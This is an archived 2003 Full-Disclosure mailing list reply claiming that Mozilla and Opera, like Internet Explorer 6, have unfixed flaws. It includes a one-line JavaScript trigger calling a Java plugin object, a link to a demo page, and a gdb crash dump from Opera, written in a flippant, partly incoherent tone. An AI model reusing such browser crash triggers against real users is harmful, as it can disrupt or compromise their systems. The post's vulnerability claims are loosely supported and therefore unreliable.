lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <33637.66.58.158.195.1063326818.squirrel@www.nothotmail.org>
From: meme-boi at nothotmail.org (meme-boi)
Subject: RE:Internet explorer 6 on windows XP allows exection of arbitrary code ( and opera and Mozilla too)

>WORKAROUND :

>Disable active scripting or do "the sensible thing" and pick another
>>browser such as the>excellent mozilla firebird.

Mozilla ...

<script language="Javascript">
t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
</script>



hmmm

or

http://drorshalev.brinkster.net/dev/memeboi/werd.html

Both serious issues mozilla has yet to fix.


Or we can look at Opera and conclude that no graphical browser is safe:


/usr/bin/opera: line 138:  1289 Segmentation fault     
"${BINARYDIR}/opera" "${@}"
"${BINARYDIR}/opera" "${@}"
(gdb) /opt/opera/lib/opera/plugins/operamotifwrapper: error while loading
shared libraries: libXm.so.2: cannot open shared object file: No such file
or directory
(gdb) backtrace
#0  0x21ad4397 in waitpid () from /lib/libc.so.6
#1  0x080777f6 in kill_pid ()
#2  0x080767a3 in wait_for ()
#3  0x080687c6 in execute_command_internal ()
#4  0x0806c0a7 in execute_command ()
#5  0x0805d48c in reader_loop ()   <---murder loop
#6  0x0805b8a0 in main ()
#7  0x21a407a6 in __libc_start_main () from /lib/libc.so.6 <--redrum lib
(gdb) info reg
eax            0xfffffe00       -512
ecx            0x5da26398       1570923416
edx            0x0      0
ebx            0xffffffff       -1
esp            0x5da2635c       0x5da2635c
ebp            0x5da26378       0x5da26378
esi            0x0      0
edi            0xffffffff       -1
eip            0x21ad4397       0x21ad4397
eflags         0x246    582
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x0      0
orig_eax       0x72     114

(gdb) disass $eip-0x20 $eip+0x20
Dump of assembler code from 0x21ad4377 to 0x21ad43b7:
0x21ad4377 <waitpid+23>:        mov    $0x7,%dh
0x21ad4379 <waitpid+25>:        add    %cl,0x2b88b3(%ebx)
0x21ad437f <waitpid+31>:        add    %cl,0xf685087d(%ebx)
0x21ad4385 <waitpid+37>:        jne    0x21ad43be <waitpid+94>
0x21ad4387 <waitpid+39>:        mov    0xc(%ebp),%ecx
0x21ad438a <waitpid+42>:        mov    0x10(%ebp),%edx
0x21ad438d <waitpid+45>:        push   %ebx
0x21ad438e <waitpid+46>:        mov    %edi,%ebx
0x21ad4390 <waitpid+48>:        mov    $0x72,%eax
0x21ad4395 <waitpid+53>:        int    $0x80
0x21ad4397 <waitpid+55>:        pop    %ebx
0x21ad4398 <waitpid+56>:        cmp    $0xfffff000,%eax
0x21ad439d <waitpid+61>:        mov    %eax,%esi
0x21ad439f <waitpid+63>:        ja     0x21ad43ae <waitpid+78>
0x21ad43a1 <waitpid+65>:        mov    %esi,%eax
0x21ad43a3 <waitpid+67>:        mov    0xfffffff4(%ebp),%ebx
0x21ad43a6 <waitpid+70>:        mov    0xfffffff8(%ebp),%esi
0x21ad43a9 <waitpid+73>:        mov    0xfffffffc(%ebp),%edi
0x21ad43ac <waitpid+76>:        leave
0x21ad43ad <waitpid+77>:        ret
0x21ad43ae <waitpid+78>:        neg    %esi
0x21ad43b0 <waitpid+80>:        call   0x21a40980 <__errno_location>
0x21ad43b5 <waitpid+85>:        mov    %esi,(%eax)


Time to revert to command line !

I speak about this on the mighty bugtraq but noone listen. not even friend
9or.
Anyways. I have to go clean the floor at walmart.

ninjas are bad




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ